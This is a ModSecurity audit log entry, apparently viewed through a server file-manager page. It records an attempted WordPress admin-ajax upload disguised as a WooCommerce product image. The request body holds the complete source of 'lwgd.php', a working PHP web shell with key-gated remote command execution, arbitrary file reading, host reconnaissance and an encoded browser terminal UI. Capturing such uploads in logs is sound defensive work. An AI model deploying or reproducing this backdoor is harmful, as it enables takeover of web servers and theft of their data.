HEX
Server: Apache
System: Linux msm5694.mjhst.com 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User: camjab_ssh (1000)
PHP: 5.3.29
Disabled: NONE
$ pwd: /var/lib/modsecurity/audit/20260110/20260110-0452/
Upload Files
File: //var/lib/modsecurity/audit/20260110/20260110-0452/20260110-045243-aWIha7henDUAAGEccI4AAABD
--21213315-A--
[10/Jan/2026:04:52:43 --0500] aWIha7henDUAAGEccI4AAABD 216.106.189.40 48634 127.0.1.224 80
--21213315-B--
POST /wp-admin/admin-ajax.php HTTP/1.1
X-Real-IP: 216.106.189.40
Host: www.showercams.net
Connection: close
Content-Length: 8623
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
Content-Type: multipart/form-data; boundary=e97638aa26a71372ce5abb95209120892aaaf747cbb3213ef658176b4437
Accept-Encoding: gzip

--21213315-C--
--e97638aa26a71372ce5abb95209120892aaaf747cbb3213ef658176b4437
Content-Disposition: form-data; name="file"; filename="lwgd.php"
Content-Type: application/octet-stream

<?php
error_reporting(0);
@ini_set('display_errors', 0);
@set_time_limit(0);

$KEY = '048eb1c00973da64dd7a6f4994d6e59d';

if (!isset($_POST['key']) || $_POST['key'] !== $KEY) {
    if (isset($_GET['view'])) {
        echo base64_decode('PCFET0NUWVBFIGh0bWw+CjxodG1sPgo8aGVhZD4KICAgIDxtZXRhIGNoYXJzZXQ9IlVURi04Ij4KICAgIDx0aXRsZT5TaGVsbENyYWNrZXIgV2ViU2hlbGw8L3RpdGxlPgogICAgPHN0eWxlPgogICAgICAgICogeyBtYXJnaW46IDA7IHBhZGRpbmc6IDA7IGJveC1zaXppbmc6IGJvcmRlci1ib3g7IH0KICAgICAgICBib2R5IHsgZm9udC1mYW1pbHk6IG1vbm9zcGFjZTsgYmFja2dyb3VuZDogIzBkMTExNzsgY29sb3I6ICNjOWQxZDk7IHBhZGRpbmc6IDIwcHg7IH0KICAgICAgICAuY29udGFpbmVyIHsgbWF4LXdpZHRoOiAxMjAwcHg7IG1hcmdpbjogMCBhdXRvOyB9CiAgICAgICAgLmhlYWRlciB7IGJhY2tncm91bmQ6IGxpbmVhci1ncmFkaWVudCgxMzVkZWcsICM2NjdlZWEgMCUsICM3NjRiYTIgMTAwJSk7IHBhZGRpbmc6IDIwcHg7IGJvcmRlci1yYWRpdXM6IDEwcHg7IG1hcmdpbi1ib3R0b206IDIwcHg7IH0KICAgICAgICAuaGVhZGVyIGgxIHsgY29sb3I6IHdoaXRlOyB9CiAgICAgICAgLnRlcm1pbmFsIHsgYmFja2dyb3VuZDogIzE2MWIyMjsgYm9yZGVyOiAxcHggc29saWQgIzMwMzYzZDsgYm9yZGVyLXJhZGl1czogNnB4OyBwYWRkaW5nOiAyMHB4OyBtYXJnaW4tdG9wOiAyMHB4OyB9CiAgICAgICAgLnRlcm1pbmFsLW91dHB1dCB7IG1pbi1oZWlnaHQ6IDQwMHB4OyBtYXgtaGVpZ2h0OiA2MDBweDsgb3ZlcmZsb3cteTogYXV0bzsgbWFyZ2luLWJvdHRvbTogMTBweDsgd2hpdGUtc3BhY2U6IHByZS13cmFwOyBmb250LXNpemU6IDE0cHg7IH0KICAgICAgICAudGVybWluYWwtaW5wdXQgeyBkaXNwbGF5OiBmbGV4OyB9CiAgICAgICAgLnRlcm1pbmFsLWlucHV0IGlucHV0IHsgZmxleDogMTsgYmFja2dyb3VuZDogIzBkMTExNzsgYm9yZGVyOiAxcHggc29saWQgIzMwMzYzZDsgY29sb3I6ICNjOWQxZDk7IHBhZGRpbmc6IDEwcHg7IGZvbnQtZmFtaWx5OiBtb25vc3BhY2U7IH0KICAgICAgICAudGVybWluYWwtaW5wdXQgYnV0dG9uIHsgYmFja2dyb3VuZDogIzIzODYzNjsgY29sb3I6IHdoaXRlOyBib3JkZXI6IG5vbmU7IHBhZGRpbmc6IDEwcHggMjBweDsgY3Vyc29yOiBwb2ludGVyOyBtYXJnaW4tbGVmdDogMTBweDsgfQogICAgICAgIC50ZXJtaW5hbC1pbnB1dCBidXR0b246aG92ZXIgeyBiYWNrZ3JvdW5kOiAjMmVhMDQzOyB9CiAgICAgICAgLmluZm8geyBiYWNrZ3JvdW5kOiAjMTYxYjIyOyBib3JkZXI6IDFweCBzb2xpZCAjMzAzNjNkOyBib3JkZXItcmFkaXVzOiA2cHg7IHBhZGRpbmc6IDE1cHg7IG1hcmdpbi1ib3R0b206IDIwcHg7IH0KICAgICAgICAuaW5mby1ncmlkIHsgZGlzcGxheTogZ3JpZDsgZ3JpZC10ZW1wbGF0ZS1jb2x1bW5zOiByZXBlYXQoYXV0by1maXQsIG1pbm1heCgyMDBweCwgMWZyKSk7IGdhcDogMTBweDsgfQogICAgICAgIC5pbmZvLWl0ZW0geyBwYWRkaW5nOiAxMHB4OyBiYWNrZ3JvdW5kOiAjMGQxMTE3OyBib3JkZXItcmFkaXVzOiA0cHg7IH0KICAgICAgICAuaW5mby1sYWJlbCB7IGNvbG9yOiAjOGI5NDllOyBmb250LXNpemU6IDEycHg7IH0KICAgICAgICAuaW5mby12YWx1ZSB7IGNvbG9yOiAjNThhNmZmOyBmb250LXdlaWdodDogYm9sZDsgfQogICAgPC9zdHlsZT4KPC9oZWFkPgo8Ym9keT4KICAgIDxkaXYgY2xhc3M9ImNvbnRhaW5lciI+CiAgICAgICAgPGRpdiBjbGFzcz0iaGVhZGVyIj4KICAgICAgICAgICAgPGgxPuKaoSBTaGVsbENyYWNrZXIgV2ViU2hlbGw8L2gxPgogICAgICAgICAgICA8cD5SZW1vdGUgQ29tbWFuZCBFeGVjdXRpb24gSW50ZXJmYWNlPC9wPgogICAgICAgIDwvZGl2PgogICAgICAgIDxkaXYgY2xhc3M9ImluZm8iIGlkPSJzeXNJbmZvIj4KICAgICAgICAgICAgPGRpdiBjbGFzcz0iaW5mby1ncmlkIj4KICAgICAgICAgICAgICAgIDxkaXYgY2xhc3M9ImluZm8taXRlbSI+CiAgICAgICAgICAgICAgICAgICAgPGRpdiBjbGFzcz0iaW5mby1sYWJlbCI+SG9zdG5hbWU8L2Rpdj4KICAgICAgICAgICAgICAgICAgICA8ZGl2IGNsYXNzPSJpbmZvLXZhbHVlIiBpZD0iaG9zdG5hbWUiPkxvYWRpbmcuLi48L2Rpdj4KICAgICAgICAgICAgICAgIDwvZGl2PgogICAgICAgICAgICAgICAgPGRpdiBjbGFzcz0iaW5mby1pdGVtIj4KICAgICAgICAgICAgICAgICAgICA8ZGl2IGNsYXNzPSJpbmZvLWxhYmVsIj5PUzwvZGl2PgogICAgICAgICAgICAgICAgICAgIDxkaXYgY2xhc3M9ImluZm8tdmFsdWUiIGlkPSJvcyI+TG9hZGluZy4uLjwvZGl2PgogICAgICAgICAgICAgICAgPC9kaXY+CiAgICAgICAgICAgICAgICA8ZGl2IGNsYXNzPSJpbmZvLWl0ZW0iPgogICAgICAgICAgICAgICAgICAgIDxkaXYgY2xhc3M9ImluZm8tbGFiZWwiPlBIUDwvZGl2PgogICAgICAgICAgICAgICAgICAgIDxkaXYgY2xhc3M9ImluZm8tdmFsdWUiIGlkPSJwaHAiPkxvYWRpbmcuLi48L2Rpdj4KICAgICAgICAgICAgICAgIDwvZGl2PgogICAgICAgICAgICAgICAgPGRpdiBjbGFzcz0iaW5mby1pdGVtIj4KICAgICAgICAgICAgICAgICAgICA8ZGl2IGNsYXNzPSJpbmZvLWxhYmVsIj5Vc2VyPC9kaXY+CiAgICAgICAgICAgICAgICAgICAgPGRpdiBjbGFzcz0iaW5mby12YWx1ZSIgaWQ9InVzZXIiPkxvYWRpbmcuLi48L2Rpdj4KICAgICAgICAgICAgICAgIDwvZGl2PgogICAgICAgICAgICAgICAgPGRpdiBjbGFzcz0iaW5mby1pdGVtIj4KICAgICAgICAgICAgICAgICAgICA8ZGl2IGNsYXNzPSJpbmZvLWxhYmVsIj5Xb3JraW5nIERpcjwvZGl2PgogICAgICAgICAgICAgICAgICAgIDxkaXYgY2xhc3M9ImluZm8tdmFsdWUiIGlkPSJwd2QiPkxvYWRpbmcuLi48L2Rpdj4KICAgICAgICAgICAgICAgIDwvZGl2PgogICAgICAgICAgICA8L2Rpdj4KICAgICAgICA8L2Rpdj4KICAgICAgICA8ZGl2IGNsYXNzPSJ0ZXJtaW5hbCI+CiAgICAgICAgICAgIDxkaXYgY2xhc3M9InRlcm1pbmFsLW91dHB1dCIgaWQ9Im91dHB1dCI+PC9kaXY+CiAgICAgICAgICAgIDxkaXYgY2xhc3M9InRlcm1pbmFsLWlucHV0Ij4KICAgICAgICAgICAgICAgIDxpbnB1dCB0eXBlPSJ0ZXh0IiBpZD0iY21kIiBwbGFjZWhvbGRlcj0iRW50ZXIgY29tbWFuZC4uLiIgb25rZXlwcmVzcz0iaWYoZXZlbnQua2V5PT09J0VudGVyJylleGVjKCkiPgogICAgICAgICAgICAgICAgPGJ1dHRvbiBvbmNsaWNrPSJleGVjKCkiPkV4ZWN1dGU8L2J1dHRvbj4KICAgICAgICAgICAgPC9kaXY+CiAgICAgICAgPC9kaXY+CiAgICA8L2Rpdj4KICAgIDxzY3JpcHQ+CiAgICAgICAgY29uc3QgS0VZID0gJzA0OGViMWMwMDk3M2RhNjRkZDdhNmY0OTk0ZDZlNTlkJzsKICAgICAgICBjb25zdCBTSEVMTF9VUkwgPSB3aW5kb3cubG9jYXRpb24uaHJlZi5zcGxpdCgnPycpWzBdOwogICAgICAgIAogICAgICAgIGFzeW5jIGZ1bmN0aW9uIGFwaUNhbGwoYWN0aW9uLCBkYXRhID0ge30pIHsKICAgICAgICAgICAgZGF0YS5rZXkgPSBLRVk7CiAgICAgICAgICAgIGRhdGEuYWN0aW9uID0gYWN0aW9uOwogICAgICAgICAgICBjb25zdCByZXNwb25zZSA9IGF3YWl0IGZldGNoKFNIRUxMX1VSTCwgewogICAgICAgICAgICAgICAgbWV0aG9kOiAnUE9TVCcsCiAgICAgICAgICAgICAgICBoZWFkZXJzOiB7ICdDb250ZW50LVR5cGUnOiAnYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkJyB9LAogICAgICAgICAgICAgICAgYm9keTogbmV3IFVSTFNlYXJjaFBhcmFtcyhkYXRhKQogICAgICAgICAgICB9KTsKICAgICAgICAgICAgcmV0dXJuIGF3YWl0IHJlc3BvbnNlLnRleHQoKTsKICAgICAgICB9CiAgICAgICAgCiAgICAgICAgYXN5bmMgZnVuY3Rpb24gbG9hZEluZm8oKSB7CiAgICAgICAgICAgIGNvbnN0IGRhdGEgPSBhd2FpdCBhcGlDYWxsKCdpbmZvJyk7CiAgICAgICAgICAgIGNvbnN0IGluZm8gPSBKU09OLnBhcnNlKGRhdGEpOwogICAgICAgICAgICBkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgnaG9zdG5hbWUnKS50ZXh0Q29udGVudCA9IGluZm8uaG9zdG5hbWU7CiAgICAgICAgICAgIGRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCdvcycpLnRleHRDb250ZW50ID0gaW5mby5vczsKICAgICAgICAgICAgZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoJ3BocCcpLnRleHRDb250ZW50ID0gaW5mby5waHA7CiAgICAgICAgICAgIGRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCd1c2VyJykudGV4dENvbnRlbnQgPSBpbmZvLnVzZXI7CiAgICAgICAgICAgIGRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCdwd2QnKS50ZXh0Q29udGVudCA9IGluZm8ucHdkOwogICAgICAgIH0KICAgICAgICAKICAgICAgICBhc3luYyBmdW5jdGlvbiBleGVjKCkgewogICAgICAgICAgICBjb25zdCBjbWQgPSBkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgnY21kJykudmFsdWU7CiAgICAgICAgICAgIGlmICghY21kKSByZXR1cm47CiAgICAgICAgICAgIAogICAgICAgICAgICBjb25zdCBvdXRwdXQgPSBkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgnb3V0cHV0Jyk7CiAgICAgICAgICAgIG91dHB1dC5pbm5lckhUTUwgKz0gJzxzcGFuIHN0eWxlPSJjb2xvcjogIzU4YTZmZjsiPiQgJyArIGNtZCArICc8L3NwYW4+XG4nOwogICAgICAgICAgICAKICAgICAgICAgICAgY29uc3QgcmVzdWx0ID0gYXdhaXQgYXBpQ2FsbCgnZXhlYycsIHsgY21kIH0pOwogICAgICAgICAgICBvdXRwdXQuaW5uZXJIVE1MICs9IHJlc3VsdCArICdcblxuJzsKICAgICAgICAgICAgb3V0cHV0LnNjcm9sbFRvcCA9IG91dHB1dC5zY3JvbGxIZWlnaHQ7CiAgICAgICAgICAgIAogICAgICAgICAgICBkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgnY21kJykudmFsdWUgPSAnJzsKICAgICAgICB9CiAgICAgICAgCiAgICAgICAgbG9hZEluZm8oKTsKICAgIDwvc2NyaXB0Pgo8L2JvZHk+CjwvaHRtbD4=');
        exit;
    }
    http_response_code(404);
    exit('404 Not Found');
}

$action = $_POST['action'] ?? '';

switch ($action) {
    case 'ping':
        echo 'LWGD_PONG';
        break;
    
    case 'info':
        echo json_encode([
            'hostname' => gethostname(),
            'os' => PHP_OS,
            'php' => PHP_VERSION,
            'server' => $_SERVER['SERVER_SOFTWARE'] ?? 'Unknown',
            'user' => get_current_user(),
            'pwd' => getcwd(),
            'disabled_functions' => ini_get('disable_functions')
        ]);
        break;
    
    case 'exec':
        $cmd = $_POST['cmd'] ?? '';
        $output = '';
        if (function_exists('system')) {
            ob_start();
            @system($cmd . ' 2>&1');
            $output = ob_get_clean();
        } elseif (function_exists('shell_exec')) {
            $output = @shell_exec($cmd . ' 2>&1');
        } elseif (function_exists('exec')) {
            @exec($cmd . ' 2>&1', $arr);
            $output = implode("\n", $arr);
        } elseif (function_exists('passthru')) {
            ob_start();
            @passthru($cmd . ' 2>&1');
            $output = ob_get_clean();
        } else {
            $output = 'ERROR: All exec functions disabled';
        }
        echo $output;
        break;
    
    case 'readfile':
        $file = $_POST['file'] ?? '';
        if (file_exists($file)) {
            echo base64_encode(file_get_contents($file));
        } else {
            echo 'ERROR: File not found';
        }
        break;
}
?>
--e97638aa26a71372ce5abb95209120892aaaf747cbb3213ef658176b4437
Content-Disposition: form-data; name="action"

woocommerce_upload_product_image
--e97638aa26a71372ce5abb95209120892aaaf747cbb3213ef658176b4437--

--21213315-I--
action=woocommerce%5fupload%5fproduct%5fimage
--21213315-F--
HTTP/1.1 400 Bad Request
X-Powered-By: PHP/5.3.29
X-Robots-Tag: noindex
X-Content-Type-Options: nosniff
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
X-Frame-Options: SAMEORIGIN
Referrer-Policy: strict-origin-when-cross-origin
Content-Length: 3
Connection: close
Content-Type: text/html; charset=UTF-8

--21213315-E--

--21213315-H--
Stopwatch: 1768038763211537 159206 (- - -)
Stopwatch2: 1768038763211537 159206; combined=62, p1=40, p2=6, p3=14, p4=0, p5=1, sr=27, sw=1, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); 200911012341.
Server: Apache/2.2.31 (Unix) mod_ssl/2.2.31 OpenSSL/1.0.2k-fips PHP/5.3.29 mod_fastcgi/2.4.6
Engine-Mode: "ENABLED"

--21213315-Z--
@ Telegram